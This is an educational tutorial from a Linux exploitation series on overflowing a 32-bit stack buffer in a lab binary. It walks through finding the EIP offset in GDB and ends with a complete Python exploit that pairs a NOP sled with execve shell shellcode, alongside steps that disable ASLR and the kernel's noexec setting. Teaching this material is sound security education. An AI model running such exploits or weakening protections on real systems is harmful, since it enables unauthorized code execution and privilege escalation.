Basic Stack Buffer Overflow on x86

A comprehensive guide to exploiting stack buffer overflows on 32-bit Linux systems, from vulnerability discovery to shellcode execution.

Prerequisites

  • Understanding of x86 assembly and calling conventions
  • Familiarity with GDB and GDB-PEDA
  • Basic Python scripting
  • Knowledge of memory layout and the stack

Part 5 of 13 in Linux Exploitation Fundamentals

This tutorial walks through exploiting a classic stack buffer overflow on a 32-bit Linux system. We’ll identify the vulnerability, find the EIP offset, and execute shellcode to spawn a shell.

Note

Lab Setup: This tutorial uses the vuln binary from the Linux Exploitation Lab (02-basic-overflow-x86/). See the setup guide for build instructions and tool installation.

If building natively, install the required tools and disable ASLR:

sudo apt install checksec ltrace gdb
# Disable ASLR (re-enable with value 2 when done)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Remember to re-enable ASLR when you’re finished: echo 2 | sudo tee /proc/sys/kernel/randomize_va_space

For a visual introduction to how buffer overflows corrupt memory, the Memory Corruption Playground lets you trigger overflows and watch the stack corrupt in real time. The Exploit Chain Visualizer maps the full five-stage path from vulnerability discovery through code execution.

Initial Analysis

Identifying Vulnerable Functions

Use ltrace to trace library calls:

ltrace ./unknown

If you see strcpy being called with user-controlled input, the binary is likely vulnerable:

strcpy(0xbffff456, "user_input"...

Checking Security Settings

Use checksec to identify protections:

checksec --file=./unknown

For this tutorial, we assume:

  • NX disabled (executable stack)
  • No stack canary
  • No PIE
  • ASLR disabled. ASLR (Address Space Layout Randomization) randomizes the base addresses of the stack, heap, and shared libraries each time a program runs, making hardcoded addresses unreliable. We disable it for learning so that addresses remain predictable between runs.
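To confirm the ASLR setting from a script rather than by eye, a minimal Python sketch could read the same /proc file and interpret its value. The helper names describe_aslr and read_aslr are illustrative, and the descriptions paraphrase the kernel's documented meanings for the values 0, 1, and 2.

```python
# Sketch: interpret /proc/sys/kernel/randomize_va_space.
# Helper names are illustrative, not part of the lab tooling.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base, shared libraries and vDSO randomized",
    2: "as 1, plus heap (brk) randomized",
}


def describe_aslr(raw):
    """Map the raw file contents (e.g. '0\\n') to a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown value")


def read_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read and describe the current ASLR mode (Linux only)."""
    with open(path) as fh:
        return describe_aslr(fh.read())
```

Calling read_aslr() on the lab machine should report "disabled" before you continue; any other value means hardcoded stack addresses will not be stable between runs.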

Warning

Verify your binary actually has no mitigations. Many modern toolchains enable -fstack-protector-strong, PIE, and full RELRO by default, so a binary you build yourself with gcc vuln.c -o vuln will likely have a canary even if you didn’t ask for one. The lab vuln is built explicitly with -fno-stack-protector -no-pie -z execstack -m32 to remove them. Confirm before continuing:

checksec --file=./unknown
# Expect: Canary: No canary, NX: NX disabled, PIE: No PIE

If you see “Canary found” or “PIE enabled”, later steps will fail in confusing ways (the canary check kills the process before EIP gets overwritten, or the addresses you hardcode are wrong on the next run). The mitigation-bypass tutorials later in this series cover what to do when you cannot just disable them.

Finding the EIP Offset

Discovering the Crash Point

The binary takes command-line arguments. Test for overflow:

gdb -q ./unknown
gdb-peda$ pattern create 400
gdb-peda$ run 'AAA%AAs...'  # paste the pattern

After the crash:

Stopped reason: SIGSEGV
0x5a254177 in ?? ()
gdb-peda$ pattern offset 0x5a254177
1512391031 found at offset: 390
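To see why a cyclic pattern reveals the offset, here is a minimal Python sketch of the idea. It uses a Metasploit-style alphabet (Aa0Aa1...), which is an assumption for illustration and not PEDA's own pattern, so its offsets only agree with patterns generated by this same sketch. The function names are hypothetical.

```python
import string
import struct


def pattern_create(length):
    """Build a cyclic pattern in which every 4-byte window is unique."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the pattern's unique range")


def pattern_offset(eip_value, length=400):
    """Return the offset of the 4 bytes that ended up in EIP, or -1."""
    # EIP holds the bytes as a little-endian integer, so pack it back
    # into the byte order in which it appeared in the input.
    needle = struct.pack("<I", eip_value)
    return pattern_create(length).find(needle)


# Simulate a crash in which bytes 390..393 of the pattern overwrote EIP.
pattern = pattern_create(400)
simulated_eip = struct.unpack("<I", pattern[390:394])[0]
offset = pattern_offset(simulated_eip)
```

Because each 4-byte window occurs only once, the value found in EIP maps back to exactly one position in the input, which is the number of filler bytes needed before the return address.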

Verifying EIP Control

Create a test payload:

#!/usr/bin/env python3
# payload.py
import sys

payload = b"A"*390
payload += b"BBBB"
sys.stdout.buffer.write(payload)

Run it under GDB:

gdb-peda$ run `python3 payload.py`

Stopped reason: SIGSEGV
0x42424242 in ?? ()

EIP is under our control.

Locating the Buffer in Memory

Examine the stack to find where our buffer lands:

gdb-peda$ x/30wx $esp-0x190
0xbffff2a0:     0xb7fd91c0      0x4141fc08      0x41414141      0x41414141
0xbffff2b0:     0x41414141      0x41414141      0x41414141      0x41414141

Look for the repeating 0x41414141 pattern in the hex dump; this is where your ‘A’ characters (0x41 in ASCII) landed. The start of this pattern is your buffer address.

The buffer begins at approximately 0xbffff2a6.
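The address arithmetic can be checked with a short Python sketch that re-serializes the dumped words into bytes and finds the first run of 0x41. The function name first_fill_address is hypothetical; the input values are the first four words of the dump above.

```python
import struct


def first_fill_address(base, words, fill=0x41, run=4):
    """Return the address of the first `run` consecutive fill bytes.

    `words` are the 32-bit values printed by x/wx, starting at `base`.
    Each word is little-endian, so its low byte sits at the lowest address.
    """
    raw = b"".join(struct.pack("<I", w) for w in words)
    idx = raw.find(bytes([fill]) * run)
    return None if idx == -1 else base + idx


# First row of the dump: the word 0x4141fc08 is stored as 08 fc 41 41,
# so the 'A' bytes start two bytes into that word.
dump_row = [0xb7fd91c0, 0x4141fc08, 0x41414141, 0x41414141]
buffer_start = first_fill_address(0xbffff2a0, dump_row)
```

This is why the buffer starts at an address ending in 6 rather than on a word boundary: the first two 'A' bytes occupy the upper half of the second word.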

Testing Execution Flow

Using INT3 Breakpoints

Before adding shellcode, verify we can redirect execution using INT3 instructions:

Note

Little-Endian Byte Ordering: x86 and x86-64 processors use little-endian byte ordering, which stores the least significant byte at the lowest memory address. This means addresses must be written in reverse byte order in exploits. For example, the address 0x080484cb becomes \xcb\x84\x04\x08 in your payload. If you see an address like 0xdeadbeef, you’d write it as \xef\xbe\xad\xde.

#!/usr/bin/env python3
# payload.py
import sys

payload = b"\xcc"*390              # INT3 breakpoints
payload += b"\xc0\xf2\xff\xbf"     # EIP = 0xbffff2c0

sys.stdout.buffer.write(payload)

Run it under GDB:

gdb-peda$ run `python3 payload.py`

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff2c1 in ?? ()

We’re executing code on the stack.
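Reversing address bytes by hand is error-prone. As a small sketch, Python's standard struct module can produce the little-endian encoding directly; the helper name p32 is a local convenience defined here, not something the lab provides.

```python
import struct


def p32(addr):
    """Pack a 32-bit address as 4 little-endian bytes."""
    return struct.pack("<I", addr)


# The return address used in the INT3 test payload.
ret = p32(0xbffff2c0)
```

With this helper the payload line can be written as payload += p32(0xbffff2c0), which keeps the address readable and makes later adjustments less likely to introduce a byte-order mistake.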

Adding a NOP Sled

Add NOPs before the shellcode for reliability:

#!/usr/bin/env python3
import sys

sc = b"\xcc"  # INT3 placeholder
nop = b"\x90"*50

payload = b""
payload += nop
payload += sc
payload += b"A"*(390-len(nop)-len(sc))
payload += b"\xc0\xf2\xff\xbf"  # EIP

sys.stdout.buffer.write(payload)

Creating the Exploit

Shellcode

Use a simple execve("/bin/sh") shellcode:

sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
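For readers who want to see what those bytes do, the following sketch rebuilds the same shellcode from annotated pieces. The mnemonics are a hand disassembly added for illustration; confirm them with a disassembler before relying on them.

```python
# Each entry: (machine code bytes, x86 mnemonic and purpose).
SHELLCODE_PARTS = [
    (b"\x31\xc0",             "xor eax, eax     ; eax = 0"),
    (b"\x50",                 "push eax         ; NUL terminator for the path"),
    (b"\x68\x2f\x2f\x73\x68", "push 0x68732f2f  ; '//sh'"),
    (b"\x68\x2f\x62\x69\x6e", "push 0x6e69622f  ; '/bin'"),
    (b"\x89\xe3",             "mov ebx, esp     ; ebx -> '/bin//sh'"),
    (b"\x89\xc1",             "mov ecx, eax     ; argv = NULL"),
    (b"\x89\xc2",             "mov edx, eax     ; envp = NULL"),
    (b"\xb0\x0b",             "mov al, 0x0b     ; syscall 11 = execve"),
    (b"\xcd\x80",             "int 0x80         ; invoke the kernel"),
]

# Joining the pieces yields the 23-byte string used in the exploit.
sc = b"".join(code for code, _ in SHELLCODE_PARTS)
```

The path is pushed as "/bin//sh" so that it fills exactly two 4-byte pushes, and eax is zeroed with xor rather than mov so the shellcode contains no null bytes.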

Complete Exploit

#!/usr/bin/env python3
# exploit.py
import sys

sc = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"
nop = b"\x90"*50

payload = b""
payload += nop
payload += sc
payload += b"A"*(390-len(nop)-len(sc))
payload += b"\xc0\xf2\xff\xbf"  # Return address

sys.stdout.buffer.write(payload)

Testing in GDB

gdb-peda$ run `python3 exploit.py`

process 2911 is executing new program: /bin/dash
$

Adjusting for Outside GDB

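Stack addresses differ outside the debugger. GDB adds environment variables such as LINES and COLUMNS and launches the binary by its absolute path, and because the environment and program name are stored at the top of the stack, any change in their size shifts the buffer address.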

Generate a Core Dump

ulimit -c unlimited
./unknown `python3 exploit.py`

Analyze the Core

gdb -q ./unknown ./core
gdb-peda$ x/40wx $esp-0x200

Find the NOP sled and update the return address accordingly. Choose an address that points somewhere in the middle of your NOP sled, not the exact start. This provides a margin of error: even if the actual address is slightly different at runtime, execution will still land on a NOP and slide into your shellcode.
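Choosing the midpoint can be sketched in Python as follows. The function name pick_return_address and the example sled address are hypothetical; substitute the sled start you actually observe in your core dump. The sketch also skips candidate addresses whose encoded bytes include a bad character.

```python
import struct


def pick_return_address(sled_start, sled_len, bad=b"\x00\x0a\x0d"):
    """Return (address, packed_bytes) nearest the sled midpoint.

    Searches outward from the midpoint and skips any address whose
    little-endian encoding contains a byte listed in `bad`.
    """
    mid = sled_start + sled_len // 2
    for delta in range(sled_len // 2 + 1):
        for cand in (mid + delta, mid - delta):
            if sled_start <= cand < sled_start + sled_len:
                packed = struct.pack("<I", cand)
                if not any(byte in bad for byte in packed):
                    return cand, packed
    raise ValueError("no usable address inside the sled")


# Hypothetical sled start as it might appear in a core dump.
addr, packed = pick_return_address(0xbffff2e6, 50)
```

The packed bytes can be dropped straight into the final line of exploit.py in place of the address that worked under GDB.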

Final Execution

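./unknown `python3 exploit.py`
whoami
root

Because this binary takes its payload as a command-line argument, the spawned shell inherits your terminal's stdin and stays interactive. When a target reads its payload from stdin instead, the usual idiom is (python3 exploit.py; cat) | ./binary: the cat command after the Python script keeps stdin open. Without it, the pipe closes immediately after sending the payload, and any shell spawned by the exploit would have no input to read and would exit instantly. The cat passes your keyboard input through to the spawned shell.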

Warning

whoami Output: The whoami output depends on how the binary is configured. You’ll only see root if the binary is SUID root. On a standard lab setup without SUID, you’ll see your own username; the exploit still succeeded if you got a shell.

Key Concepts

Buffer Layout

The following diagrams show the stack before and after the overflow. In the normal state, the return address points back into the caller. After the overflow, our payload has overwritten everything from the buffer through the return address:

         BEFORE OVERFLOW
┌──────────────────────────────┐
│ return address → caller      │ EBP+0x04
├──────────────────────────────┤
│ saved EBP                    │ EBP
├──────────────────────────────┤
│                              │
│ buffer + locals (386B)       │
│ (normal data)                │
│                              │
├──────────────────────────────┤
ESP → (top of stack)

         AFTER OVERFLOW
┌──────────────────────────────┐
│ 0xbffff2c0 → NOP sled        │ EBP+0x04
├──────────────────────────────┤
│ AAAA (last 4B of padding)    │ EBP
├──────────────────────────────┤
│ AAAAAAA... padding (313B)    │
├──────────────────────────────┤
│ shellcode (23B)              │
├──────────────────────────────┤
│ NOP sled: 0x90909090 (50B)   │
├──────────────────────────────┤
ESP → (top of stack)

The payload layout as a flat byte sequence:

[    NOP Sled    ][  Shellcode  ][   Padding   ][ Return Addr ]
     50 bytes        23 bytes      317 bytes       4 bytes
                                                      |
                                        Points into NOP sled

When ret executes, it pops our crafted return address (0xbffff2c0) into EIP. Execution lands somewhere in the NOP sled, slides through the 0x90 bytes, and hits the shellcode.
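The layout arithmetic can be double-checked with a small builder that derives the padding length from the offset instead of hardcoding it. This is a sketch under the tutorial's numbers (offset 390, 50-byte sled); build_payload is a hypothetical helper name.

```python
import struct

OFFSET_TO_EIP = 390  # bytes from buffer start to the saved return address

SC = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80")


def build_payload(shellcode, ret_addr, sled_len=50):
    """Assemble sled + shellcode + padding + little-endian return address."""
    sled = b"\x90" * sled_len
    pad_len = OFFSET_TO_EIP - len(sled) - len(shellcode)
    if pad_len < 0:
        raise ValueError("sled and shellcode do not fit before the return address")
    return sled + shellcode + b"A" * pad_len + struct.pack("<I", ret_addr)


payload = build_payload(SC, 0xbffff2c0)
```

Deriving the padding this way means a longer shellcode or a different sled size cannot silently push the return address away from offset 390.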

Why NOPs?

The NOP sled provides a landing zone. Small variations in stack addresses between runs are absorbed by the sled, making the exploit more reliable.
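How much variation the sled absorbs follows directly from where the return address points within it. A rough sketch, using this tutorial's addresses and a hypothetical helper named sled_tolerance:

```python
def sled_tolerance(buffer_start, sled_len, ret_addr):
    """Return (max_down, max_up): how many bytes the buffer can move to a
    lower or higher address while ret_addr still lands on a NOP or on the
    first shellcode byte."""
    offset = ret_addr - buffer_start
    if not 0 <= offset <= sled_len:
        raise ValueError("return address is outside the sled")
    # Moving the buffer up is limited by the distance to the sled start;
    # moving it down is limited by the distance to the sled end.
    return sled_len - offset, offset


max_down, max_up = sled_tolerance(0xbffff2a6, 50, 0xbffff2c0)
```

With the return address 26 bytes into a 50-byte sled, the buffer can sit up to 24 bytes lower or 26 bytes higher than observed and the exploit still works. A larger sled widens that window at the cost of padding space.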

Common Bad Characters

  • 0x00 - Null byte, terminates C strings, so strcpy stops copying at it
  • 0x0a - Newline, may terminate input
  • 0x0d - Carriage return
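A quick way to catch these before running the exploit is to scan the payload for them. The following is a minimal sketch; find_bad_chars is a hypothetical helper, and the set of bad bytes should be adjusted to however your target reads its input.

```python
BAD_CHARS = {
    0x00: "null byte",
    0x0a: "newline",
    0x0d: "carriage return",
}


def find_bad_chars(payload, bad=BAD_CHARS):
    """Return a list of (offset, byte_value) for every bad byte found."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


sc = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
      b"\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80")
hits = find_bad_chars(sc + b"\xc0\xf2\xff\xbf")
```

An empty result means neither the shellcode nor the return address contains a listed byte. Remember to re-run the check whenever the return address changes, since a new address may introduce a 0x00 or 0x0a.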

Troubleshooting

Shellcode Not Executing

If the shellcode still fails to execute even though the binary was built with -z execstack:

  1. Check kernel parameters - some kernels require noexec=off:

    # /etc/default/grub
    GRUB_CMDLINE_LINUX_DEFAULT="quiet noexec=off noexec32=off"

  2. Update grub and reboot:

    sudo update-grub
    sudo reboot

Address Differences

Stack addresses differ between GDB and normal execution. Always verify with core dumps when exploiting outside the debugger.